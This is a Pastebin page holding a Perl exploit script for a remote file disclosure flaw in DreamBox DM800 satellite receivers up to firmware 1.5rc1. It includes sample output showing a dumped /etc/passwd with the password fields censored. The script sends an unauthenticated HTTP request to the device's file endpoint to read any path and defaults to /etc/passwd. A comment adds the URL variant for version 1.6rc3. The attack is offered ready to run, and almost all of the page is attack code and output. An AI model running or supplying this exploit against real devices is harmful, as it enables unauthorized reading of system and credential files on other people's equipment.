Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
- #
- # Author: Todor Donev
- # Email: todor.donev@@gmail.com
- # Type: Hardware
- # Vuln Type: Remote
- #####
- # Product summary: DreamBox DM800 is Powerful receiver
- # for digital TV and Radio programs based on Linux.
- # Product web page: http://www.dream-multimedia-tv.de
- #####
- # playground$ perl dreambox.pl target /etc/passwd
- # [+] DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
- #
- # root:<CENSORED>:0:0:root:/home/root:/bin/sh
- # daemon:*:1:1:daemon:/usr/sbin:/bin/sh
- # bin:*:2:2:bin:/bin:/bin/sh
- # sys:*:3:3:sys:/dev:/bin/sh
- # sync:*:4:65534:sync:/bin:/bin/sync
- # games:*:5:60:games:/usr/games:/bin/sh
- # man:*:6:12:man:/var/cache/man:/bin/sh
- # lp:*:7:7:lp:/var/spool/lpd:/bin/sh
- # mail:*:8:8:mail:/var/mail:/bin/sh
- # news:*:9:9:news:/var/spool/news:/bin/sh
- # uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
- # proxy:*:13:13:proxy:/bin:/bin/sh
- # www-data:*:33:33:www-data:/var/www:/bin/sh
- # backup:*:34:34:backup:/var/backups:/bin/sh
- # list:*:38:38:Mailing List Manager:/var/list:/bin/sh
- # irc:*:39:39:ircd:/var/run/ircd:/bin/sh
- # gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
- # nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
- # avahi:x:500:64002:Avahi:/var/run/avahi-daemon:/bin/sh
- # ftp:x:501:64003:Linux User,,,:/var/tmp/ftp:/bin/false
- # gbox:<CENSORED>:0:0::/:/bin/sh
- #
- # playground$
- #####
- # Thanks to all my friends and special to the best Tsvetelina Emirska,
- # that support and respect me !! =)
- #####
- #
- # http://www.ethical-hacker.org/
- # https://www.facebook.com/ethicalhackerorg
- #
- use LWP::Simple;
- print "[+] DreamBox DM800 <= 1.5rc1 Remote File Disclosure\n";
- $host = $ARGV[0];
- $d = $ARGV[1];
- if(! $ARGV[0]) {
- print "[!] usg: perl dreambox.pl <host> </path/file>\n";
- exit;
- }
- if(! $ARGV[1]) {
- $d = "/etc/passwd";
- }
- ## Edit here for exploitng DreamBox DM800 <= 1.6rc3
- # my $result = get("http://$host/file?file=$d");
- ## Greetings for ShellVision who found this bug in version 1.6rc3
- my $result = get("http://$host/file/?file=$d");
- if (defined $result) {
- print "\n$result";
- }
- else {
- print "[-] Not vuln.. =(";
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement